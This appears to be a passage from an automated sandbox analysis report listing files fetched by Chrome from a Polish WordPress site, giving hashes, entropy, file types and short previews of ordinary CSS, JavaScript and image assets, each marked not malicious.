                                                            Entropy (8bit):4.908672693926512
                                                            Encrypted:false
                                                            SSDEEP:768:LX1XvTz4EkA5SOV+LQ35lqCXm9XhUnoeYKiFzL487Plxo66F7UJGqUzu8ZZ+ucJ0:LX1X7DkA5SOV+LQ35S9fBFrS
                                                            MD5:43C4BC05B5E3B0A6684A7C3A52E63590
                                                            SHA1:ED6D95D525A710A82E8B8583E9BA7BCE3B2A4722
                                                            SHA-256:9110FC122DDA3067C424D9B8FF7747E2030B0BD9298F69A3683D399AD3373A6A
                                                            SHA-512:661CE465D60C6C6D5738C9A7E948985772E3CBFED985D91D704121F77B91E7CDD43421217FA9A19DBA6D2F5AC68AD4887DCE1CEDE825395966587F29C8BACE79
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/css/dist/block-library/style.min.css?ver=5.8
                                                            Preview:@charset "UTF-8";#start-resizable-editor-section{display:none}.wp-block-audio{margin:0 0 1em}.wp-block-audio figcaption{margin-top:.5em;margin-bottom:1em}.wp-block-audio audio{width:100%;min-width:300px}.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;cursor:pointer;display:inline-block;font-size:1.125em;padding:calc(.667em + 2px) calc(1.333em + 2px);text-align:center;text-decoration:none;overflow-wrap:break-word;box-sizing:border-box}.wp-block-button__link:active,.wp-block-button__link:focus,.wp-block-button__link:hover,.wp-block-button__link:visited{color:#fff}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-buttons>.wp-block-bu
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):15891
                                                            Entropy (8bit):7.9684647208489485
                                                            Encrypted:false
                                                            SSDEEP:384:IQ9pzODJLJYsnP9f8DqZ0Ym0Ye9fMxN003nehnp44:bpzODJLysnlGqC70YeaGGnehp44
                                                            MD5:D126BF8A3DFEDED72A0888872962B3FB
                                                            SHA1:74FFD9969B4CFBE65303773DDCA3CB30FB8BD295
                                                            SHA-256:42009AD365B5D81F7B443E190CFC0019481EE36309BEE1EA40A2A24757B25465
                                                            SHA-512:A982DB5F7FCD8B59E9436E8F5BBDAFCA01BFD0CC076254B232534CFF0EF4FE446E9F46FF268EDC734B12D7582BB70F7E93EE19A668737AC9E2C6F0E7BA463957
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/intermarche_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...`TW..;..b......-.R.-R.Rww.om.....ne.n].R.J..R....!$!..3....L.a.......p..v.s....k:...5..t.Z.3.-.G....c...:..)...M.6S2.x..c.+W.Z.f.a..[.g...f.'....?.p...uNH....QRZ....H.U.$hK.`Q.h3..g-.(..-.....,...@I.~.....t0.M...D....s.=P..%.K...!0.H...u.#3.c./.W...R.....=......._{.5.Y^......^..uD.tF...............nAXD.BB....5..i...X[.q..r..E..y.\...X...c.1.F3..<.....1`......<n..,.q.(S...?_x..k.Z.3...b...~.`q.}.u....b.X.6@.OMS.">[./......fo..q.(3.ZJ.........C...~.i.(S6.(.`...JCc...".....0..q.j:.....SE....."S.>*6m.T.o.xO......P..rssE..n..Q........G.'.e..<.TJJ.Qe.[<..6X.2.j..+....5.gj..q...{.....+.4`04.........4._v...-.;E...........-...;..h..2u.S..K/......#.yk.z.... 44T..GI.V.Mv....@..x.*i.1.Uk.(C.g.j.....\..D.H..J....hD..Adt8b.c.~...D..3.....^..=,...Tjb.....m2...B?.p.<.L.[...F..w^..(S.!Q..u].......}.)'a....III^g.h4b..........d..S.N..H3]...\...M..O......&ScD.5.....4....mOC.l.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 350x350, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=15, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-M1 , orientation=upper-left, xresolution=267, yresolution=275, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 12:41:51], progressive, precision 8, 447x386, components 3
                                                            Category:downloaded
                                                            Size (bytes):98996
                                                            Entropy (8bit):7.822491069715387
                                                            Encrypted:false
                                                            SSDEEP:1536:tPwXPw4/krhzPAFNQa5N5SY+H6VwFFbA48PQKuMDZgCFZSkPFGZ/rj:WaR4FNQwNC+wF+xoycGFY/rj
                                                            MD5:FB7B8648A85ECAB33A1F0D9EDB48DA80
                                                            SHA1:1DD2252E7028E1DAE8126843984A068595B180BC
                                                            SHA-256:CE5512B1DAA5BED5CB1A8C17F4E2700BF06B58D5BD4631E40AC9B25C4020EFE4
                                                            SHA-512:3C7227D779A08231F292C121027E680D268D3E50CF0A49A37A10D360DD98061D35C38463EB1D1BC1F4DB3E355C79C118FFC1AD26BD167D423B23644419A69DE5
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/10/rozne.jpg
                                                            Preview:......JFIF.....^.^......Exif..II*........... ...................................................................(...........1...........2.......2...;...@...F...................@...................i...........%...........$...OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-M1 .^.......^.......Adobe Photoshop 7.0 CE.2018:07:26 12:41:51.................................................................................................................................PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@..................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (4186), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):4186
                                                            Entropy (8bit):4.923675414240059
                                                            Encrypted:false
                                                            SSDEEP:48:wFfAeWkkqEsKO+TBxaBIIj+NqUFQW76d7JrOv2bN:wueWkkrLoI7U
                                                            MD5:EA958276B7DE454BD3C2873F0DC47E5F
                                                            SHA1:B143F6E8E8F79D8F104C26B0057EF5514D763219
                                                            SHA-256:2E10D353FF038C2CAD3492FC17801AF3E6EF2669C9E9713BDB78B1DCB104C4FE
                                                            SHA-512:2D40A1E713355EFF88FA3BBF5471B4DB5ACC48FA2B978A555C034F2E5C7F131FCAF48E849D5D048DF9D5DAE068C4B6467A97B1DDE99115E6B32F57E928569FC1
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.8
                                                            Preview:.mejs-container{clear:both;max-width:100%}.mejs-container *{font-family:Helvetica,Arial}.mejs-container,.mejs-container .mejs-controls,.mejs-embed,.mejs-embed body{background:#222}.mejs-time{font-weight:400;word-wrap:normal}.mejs-controls a.mejs-horizontal-volume-slider{display:table}.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-current,.mejs-controls .mejs-time-rail .mejs-time-loaded{background:#fff}.mejs-controls .mejs-time-rail .mejs-time-current{background:#0073aa}.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-total,.mejs-controls .mejs-time-rail .mejs-time-total{background:rgba(255,255,255,.33)}.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-current,.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-total,.mejs-controls .mejs-time-rail span{border-radius:0}.mejs-overlay-loading{background:0 0}.mejs-controls button:hover{border:none;-webkit-box-shadow:none;box-shadow:none}.me-cannotplay{width:au
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 500x500, components 3
                                                            Category:downloaded
                                                            Size (bytes):47028
                                                            Entropy (8bit):7.967811048229423
                                                            Encrypted:false
                                                            SSDEEP:768:vwECJbQ0Qk/L8H2LP/HY5Z5ONUJRNFCbK0qYSpgZMwwKKT3CRTG:vYJR1T8H2bfY5Z53JRpvYe0e3Cs
                                                            MD5:DCFCF51628A0F66333A492C4DBB588E4
                                                            SHA1:9DB12C5A2A549101B0384C464C1BE397C07BEF5D
                                                            SHA-256:3B01E87D5004DE78C43042F6FF6568962349331F01BF650CB374D301AF923E1A
                                                            SHA-512:D08BE824A4E8E7D6B400C3CD451AE9D0E54FB6B4EAEA3FEE26B88719F198082E863E9FC0AD6E011D2750593B7C09AA41E7060E3E781206FD43711E19848670B3
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/01/mickey2-500x500.jpg
                                                            Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...Q.v(.}...a.S.K.,..1F)...0.1N.....7.b..\Q`..F)..X9..v(...a....Q...n(.;.b....)...0.Q.~)1@s....b.P..qF)...0.Q.v(...7.b..6.a9...).iB.....pCR.d.....N....2{T..=.F.5....?..w....G\.V.a,\V.6-..*h.I<.Wkg...?..2v=.GM.,....F@.<Rm-[0....=[.{..i.....<...eC.p1J..?...7..c.WLs.C.T..s..c`..+.<;..4...@]c.m....qXw..F.j#..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 432 x 240, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):73838
                                                            Entropy (8bit):7.992295347349307
                                                            Encrypted:true
                                                            SSDEEP:1536:snj+1vldwJBd5+Jq6ve+E3s4dnaTvbRNqGunrPPtyph:+j+19yvd5Yad0b+G+rPPtwh
                                                            MD5:7C0FA5FE104A05D3F26206FB80A69568
                                                            SHA1:3BA1927FBBD2035A3F1F6C061B371F26C210BC0A
                                                            SHA-256:A1F6C1BFC0EBE695AEBE62B8C0B951609BFB994C93EB2EC3F03B357C8EEA6658
                                                            SHA-512:6F27F7D3785A1A90B95E63CCFBE5AD87284955BCBEB28C6A6A872D2670E2326F2981166E3AE2D30915E49A48C666F02B6569BBD594EF2AF7A023E4639568F88F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR..............f.d....pHYs...&...&...%... .IDATx..].xTE..{:......."....HQ.A.. M.~.".RE."..(....X....A:........Nr...Bh.y..nn..3..9.....?..7......c.q.L..z\.5'...J..".v.p..s:..-}g..T*..h........2N..y....nW...q.Rt....5.T.RzLll..f..7.....{....j...SM.5;.ot0<##*.:..VDC....c>.Xj.~.b.~;..kN.:U.V.Z..z...<%.gl.._.t.SO?..?..xTTTFXXx.B!......;v.Boo.+.....m0.{o2...U...q.&.i..<......q.)...<.>|*...C....O]b.........[.N..=[....=.N...~..I......u...c....=.T;v<)1..F.qj.Z...o.3.v..2..5...vL&.qj...'9.V..gOo..HFFFB. .CBB....V;..j.....X.Ln..uv.BqM.f.{.2[jj.}.*.....G6.wn....a..\....j58.N....d2W.\%....j.N......@..M(..b.,`..1..N.....gy.o...[xxDvXXX..C.0.`.6...[...N..E:.S(T...y..-.}0x.`..n...n.5.. ...._f:......EFF^.wfff$.7"""..6..b.f.'.=.z..../...W.l.....o../......./\.P.....Q.F.;w.lN.Mf.R.4p.....X....+a........:4.].N..$&....o.....R.Z...8..~z.f....7.s...8.e....F....?...w..Q8.}....k......g....oM.'..:.b..7.-A;&'...d.9.}{.#..........:m..7..10.....4J...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1000x500, components 3
                                                            Category:downloaded
                                                            Size (bytes):7030
                                                            Entropy (8bit):1.4682117631264164
                                                            Encrypted:false
                                                            SSDEEP:24:7QK1he91Wwjx82lY2T3ouVuGyJ3VsmzQyGbaWXrRtzJg:7dqQNn2x+J3CEQyCNtO
                                                            MD5:DD615A43D9766FC3423ED87CA11F666C
                                                            SHA1:12C53803F3BBC4CE40B98C4492B757CB9CAC7188
                                                            SHA-256:CB9B011F3E8A679D2736D490AA86E6DED82126E87CCF633D8D3BF38799111C3C
                                                            SHA-512:1F3CB142A69BA6502D79B34196DC86D5173FFCAB9318205E7D0DCB9A10DFC85F772AAF15F53FCC3CBAD1F73278EE462280275C9D7ADBE8A71B381CAAC7215490
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/img/no-portfolio-item-wide.jpg
                                                            Preview:......Exif..II*.................Ducky.......A.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:AA6E7D124A5E11E3A72FB87F6A8D2AB5" xmpMM:DocumentID="xmp.did:AA6E7D134A5E11E3A72FB87F6A8D2AB5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AA6E7D104A5E11E3A72FB87F6A8D2AB5" stRef:documentID="xmp.did:AA6E7D114A5E11E3A72FB87F6A8D2AB5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (11277)
                                                            Category:downloaded
                                                            Size (bytes):11295
                                                            Entropy (8bit):5.526291359818204
                                                            Encrypted:false
                                                            SSDEEP:192:KKirvjKPsO/kAvi8uErTNi7OasUrxq0G/2X8EpW7QYovE3aCn9MOYFfycBmSCc:KtesO/kAOErTNiSasUNqpo8EpW7QYosm
                                                            MD5:C111C3F8FE864ABCA632348A67AC2E02
                                                            SHA1:5A9BB456B170C9172C30C86D3686032DE0A3A97A
                                                            SHA-256:19BE9961450C68D8C3C1A188ECB9EECCA5BCA8B271664025A85A88F903CB6B41
                                                            SHA-512:9CA9ECB097379ABAC20E4D7C5A917E42DF2C01A3185E698CBEBB1968614B5258BD1DA1D45B220F7A3620417DC9845B540FAF8E25B230FA4D57CC9306C95BAB65
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/js/touchswipe.min.js?ver=1.0
                                                            Preview:/* Touch swipe */.(function(d){var m="left",l="right",c="up",s="down",b="in",t="out",j="none",o="auto",i="swipe",p="pinch",u="tap",x="horizontal",q="vertical",g="all",e="start",h="move",f="end",n="cancel",a="ontouchstart" in window,v="TouchSwipe";var k={fingers:1,threshold:75,cancelThreshold:25,pinchThreshold:20,maxTimeThreshold:null,fingerReleaseThreshold:250,swipe:null,swipeLeft:null,swipeRight:null,swipeUp:null,swipeDown:null,swipeStatus:null,pinchIn:null,pinchOut:null,pinchStatus:null,click:null,tap:null,triggerOnTouchEnd:true,triggerOnTouchLeave:false,allowPageScroll:"auto",fallbackToMouseEvents:true,excludedElements:"button, input, select, textarea, a, .noSwipe"};d.fn.swipe=function(A){var z=d(this),y=z.data(v);if(y&&typeof A==="string"){if(y[A]){return y[A].apply(this,Array.prototype.slice.call(arguments,1))}else{d.error("Method "+A+" does not exist on jQuery.swipe")}}else{if(!y&&(typeof A==="object"||!A)){return r.apply(this,arguments)}}return z};d.fn.swipe.defaults=k;d.fn.swip
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (5449)
                                                            Category:downloaded
                                                            Size (bytes):5534
                                                            Entropy (8bit):5.059376857000022
                                                            Encrypted:false
                                                            SSDEEP:96:lRKNrH3/hMIKP97eglwWK1lOlAGnc/NKIy4yyLwarj+Q+2lu:l65MDBLVI+yMUA
                                                            MD5:18C878721233115552245950C2E78201
                                                            SHA1:2AFAA4083861A13146B52B9D100614E8459ABA80
                                                            SHA-256:7AFF974BD95503AFFABC47BFA7DA677108EC1C1EA0F54B4065814B355897C400
                                                            SHA-512:C891C2C61BBCA5347B3F65205C5AC7BCB32788E00BE444F57F90A3FBF77397E2489464E1E42CFE21E925717CCC6AF2AF5CFF2F5EA28C432663B1C8DFDD90DF18
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/light-slider/lightslider.min.css?ver=5.8
                                                            Preview:/*! lightslider - v1.1.3 - 2015-04-14.* https://github.com/sachinchoolur/lightslider.* Copyright (c) 2015 Sachin N; Licensed MIT */.lSSlideWrapper,.lSSlideWrapper .lSFade{position:relative}.lSSlideWrapper .lSSlide,.lSSlideWrapper.usingCss .lSFade>*{-webkit-transition-timing-function:inherit!important;transition-timing-function:inherit!important;-webkit-transition-duration:inherit!important;transition-duration:inherit!important}.lSSlideOuter,.lSSlideOuter .lSPager.lSGallery{-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;-webkit-touch-callout:none;-webkit-user-select:none}.lSSlideOuter .lSPager.lSGallery:after,.lSSlideWrapper>.lightSlider:after{clear:both}.lSSlideOuter{overflow:hidden;user-select:none}.lightSlider:after,.lightSlider:before{content:" ";display:table}.lightSlider{overflow:hidden;margin:0}.lSSlideWrapper{max-width:100%;overflow:hidden}.lSSlideWrapper .lSSlide{-webkit-transform:translate(0,0);-ms-transform:translate(0,0);transform:translate(0,0);-webkit-t
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):16863
                                                            Entropy (8bit):7.973709002545227
                                                            Encrypted:false
                                                            SSDEEP:384:INYW/LYtMSpkvmHKkRPDa1yOH+HWgbQPWv4DLZGMDFQJ05MQ:KdTYHwkDaVzPWuLZly05V
                                                            MD5:29A2BA4B1B597ADCD93F7A254A8979D9
                                                            SHA1:B2C01BA6639772E03F86054879C1494D01721369
                                                            SHA-256:BAC0B9BFBEA63E82F48BF78BBC63E7C0C5D95B88F09B278B592B6D0E713D55B5
                                                            SHA-512:669A7B4FF2FBDB631E1E00958C711128AD2126A4B7FFAEC8804BC10321A949F0806FF2EDB1D1459CC79223F5D8C681557D4F6EB655F4373401DE80B204CEA381
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/toysrus_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...|......^.;.......E,..+UE.....b.^{..go(........ .........}..$l.........;....<.=g....!G.x...<.H90..s..O.>..=E.3F...%..a.....5k..5j.....555..g..C....O`.K.....Y]...7.x=..V.{><.0.1..1W........y....>S/..Z..w.!...W....^....sc..K.."|..Pf........'n....gMF......I._...3.C.n.......}'....1d.....S.....?.z...g..M.O..J.....JI...W...$....;...K.R@.....$..1r..i....%..-S..c......-...Q`...X....(.../..6l.a..<"...a.q!...;0.J.........T*U.A....1bDL2X.5...j...xZ7.P(.i.W....g....<xK$..;0... .Y...4....B..4..j`......aPm....v{.....CD..k.y,.#.SE......".....6m..2dHj8.F.y..x$(...7.*..z1.......{...$(....+....}.&R..j..lXAQ:..8..%........<....;(.9.........u.......y.).53.uI.z....+..........>.U..w]'..7..k_.(t.b..TZ..)0.i...9^.znK...T7..]...>M.....x....U.W..i.p..;(....`............K.5.f#....\.H*).XA......?G>..-......4.V...W7r....s.K.Mg............1...}.....<.pI.._.1c..:.V....b..>.5...J..^...Z.....
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (2973)
                                                            Category:dropped
                                                            Size (bytes):3009
                                                            Entropy (8bit):5.171268900213841
                                                            Encrypted:false
                                                            SSDEEP:48:Q71Dmtdqc8+NTSZrIVk52Xq6z6UKoONaiGrnRKOYwighnE1sG5aAQd27J:MA9u+6nHokoM4J6sg
                                                            MD5:2768B7A41CF9EE93D8F58CC094A9FF28
                                                            SHA1:A481ED9EA351A861560EEBB05D626107BA9D44C7
                                                            SHA-256:EDC988F9162131DFA6D20D122013987468254662E7CDBC7565C39A5789EDB6CA
                                                            SHA-512:21D56B1392983CC71E0D6788EEDFBE864191681080CA7561B91362F861526B03E4A19EA57A082D0C31832D8E6B919C89B20B8375DCFB36181D4AB5998AE56354
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! This file is auto-generated */.this.wp=this.wp||{},this.wp.a11y=function(t){var e={};function n(i){if(e[i])return e[i].exports;var o=e[i]={i:i,l:!1,exports:{}};return t[i].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,i){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:i})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var i=Object.create(null);if(n.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)n.d(i,o,function(e){return t[e]}.bind(null,o));return i},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s="jncB")}({Y8OO:func
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):16061
                                                            Entropy (8bit):7.968373703526925
                                                            Encrypted:false
                                                            SSDEEP:384:IbQyg9Ty2daSkuKvtN3wCOd9Uv0WgT9gCa1j4Jlh:8HkysKftoWrCY8JP
                                                            MD5:EF2DFA52736B985CA5F901D711C83041
                                                            SHA1:BF3D6751205E66EAC8AC16120CB3A59BE9BA1B1C
                                                            SHA-256:B78F2AC51BC0C8BB6CA8EC013C3108AAD454CEAC7ACD61C2B9605932BC6B058B
                                                            SHA-512:06A3284D4BBC1CD073BF4B24BBEEABE601032DF1ED4FF85A829F9DFC2A397160EBD138CDA7BF2695EDFD20EA874F58F34ECEAF132FCD2F8D50EBAAC155D5D4DE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx.....E.....f....,....D.1..H..1.z.p..1..P....(zb..((H.%...lN....fzg{v.w..nx.....tWWWW........kkk.D.;....Y..H...k;w...E..h%aMM.'.2...~+..\...C...w..VTT4.L.....$......5].......ZKX.nD.g..~:......u..X}...D=z...F...Nc=a.(}B."&F....m.@....k.R....~{.....R..O.-6.r.,'./.'Z. .....w.Y.w..DK...'.^.J.[x........=..~.Ik..._..$...D.oa..l.7......(.w4.El..?...U].~.q..o"b...M..A...V...E5A).r.....',22..3.L'l.....be@MM...=z......DE<...n....(....h.A.x.t..wt/...[UU......h..F..x.....*+.2.0$.{ttt....-VN.#...X.4aHT.~.62Qz..=...w6>-u`.#..+j|Z....N.G..$.,.E..]*V.XQ.o..f.Z.<idz< A.+W..*(h.h*Q.....:ujJ.< A..JT.v....J..XS..hJ?D#..S={6.LIID....jM.../...-....._M../...D..j.4...9...j=...v.e+W.O.-.....=|.e....U....=..,yPwr....,..{.....u...>..Di<0.~.x.h..8/L...8..D/.Ri...Q...v......E4.5..7.w.XJ..s.J.....+{.]..1/...~...8.3.p].....d...1b..i..D!A...h.L.....[....l.M..[......r.;w..H.f.[ITY...G@H3......#.6^.0a.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 277 x 252, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):12164
                                                            Entropy (8bit):7.961970370115963
                                                            Encrypted:false
                                                            SSDEEP:192:5XBYCp0nsAXXIRmA5uZUezQH4pCBN8l6AccRfpwWBWaaOvQQt+FUAY8cKP:RKnFnI1Fe0yfccRfpDBWaVrRLKP
                                                            MD5:1B5A82586638A1D8AE000B2E10A0CC44
                                                            SHA1:15B06A2AABA74B6A0E9FDF462037D413B0E9EF32
                                                            SHA-256:02C9F8014E6916E0763E40BAA97BBD7A157D89C76265A052C13687BDCF335209
                                                            SHA-512:AD50DD09C1DBD213DBB686600684B2BF623699C92E7ADD00F9D0F4B8D20A39063686BCC78A6CB0F0DE24DFF7372FD144BC9284D117EFEB933A021396FB38BE26
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR.............Y.0.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w.../iCCPICC Profile..H..wTT....wz..0..z..0... ..Q.f......Ml..@D...E......H..b!(.`.H.Pb0...dF.J|yy.......g.s..{....$O../... .'..z8.W.G....x....0Y.A..@$/7.z........H..e..O...O.T...._..lN:K.."N.....3"..$..F../JP.rb.[.}..Q..d.[..S..l1..x{..#b.G...\N..o.X3I....[ql2.....$..8.x.......t..r.p../8...p...C...f.q....K.njm.{r2.8...?......).L^6..g.,.qm."[.Z[Z....~Q....7%.."....3......R..`.j...[.~.:.. w....!.$E}k...yh.y...Rm..333..........:..}.=#.v.....e...tq.X)I)B>==......<..8..X....9<QD.h..8Q.yl....sy....0.OZ.k.(...5..H....>.....yP..........:.8......p.........Lg....k.k...$.......t.!0.V..8.7....`.........2A....@.....JP..A#h.'@.8.....:....`....`......a!2D..!UH.2.. .d..A>P ..ECq...B.....*.*.Z....:.]..B..=h...~....L...2...........5p.......N..........:|......@...QC.....!.H,.G6 .H9R.. ]H/r..A..w(......Q.(OT...JCm@..*QGQ...-.(j...MF+...6h/.*t.:.]..G7....w...7......Xa<1...:L1....s.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 200x200, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, height=2313, bps=146, orientation=upper-left, width=1831], baseline, precision 8, 500x500, components 3
                                                            Category:dropped
                                                            Size (bytes):58539
                                                            Entropy (8bit):7.974421577528102
                                                            Encrypted:false
                                                            SSDEEP:768:/jf5PDxH656MHn+CgL584dURwJlMOHh9zcVfWzoeRVvg6NuSNEDl6O2PP1b9iI:/jBcc2nVgK4mRmZB9gV7UVvg6C6OexEI
                                                            MD5:ACCEB7B25F681B519E306AFBEBE49B52
                                                            SHA1:9889FA88640E92A687799BF617A98FE2D0BFDA25
                                                            SHA-256:B5D4B9D9C073155AFB95101853C23F2621257EECD4AA9B0D4F11663C62ADF6F8
                                                            SHA-512:17DA03AEE596928DD3F259041D35F082B55284C27708FF76E3C2C39F4256FCB4C965E906374A3CC3F8285035FC0DADEB954DF758F071DA33CD7B1B02D74D192C
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF..............Exif..II*...............'...........................................................................(...........1...........2...........i.....................................Adobe Photoshop CC (Macintosh)..2018:10:09 16:10:55...........0221....................o...........x.............................`...........h...(...................p...........;.............................JFIF.....^.^.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........~.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (32031)
                                                            Category:downloaded
                                                            Size (bytes):54806
                                                            Entropy (8bit):5.223037954122912
                                                            Encrypted:false
                                                            SSDEEP:1536:NAybbO4IUdEvPgqIFxIFkUd3CcgY4PFGvDLVFuoE6:NAyTIPIFxIFVd3CcgY20DLyoE6
                                                            MD5:519F4CA109977EB54A1EC1922E6AFE3D
                                                            SHA1:CC430A9F6A96459FD13969C0CB1D1C1EE2A9298B
                                                            SHA-256:DC7F11BD907E7CC1D37D664B6CD24553B4CE493AB24DFC028ADAEA3A4D6AA6CA
                                                            SHA-512:8761B125650149AC3404EBFE0BE31DE2A1569E009FE7E90F035C4897F794EA56605AF2B802CF0EAA6672643E5DD9353A7B5B537069F1EC0E00CBD2F76BE50DA1
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/js/isotope.min.js?ver=7.6
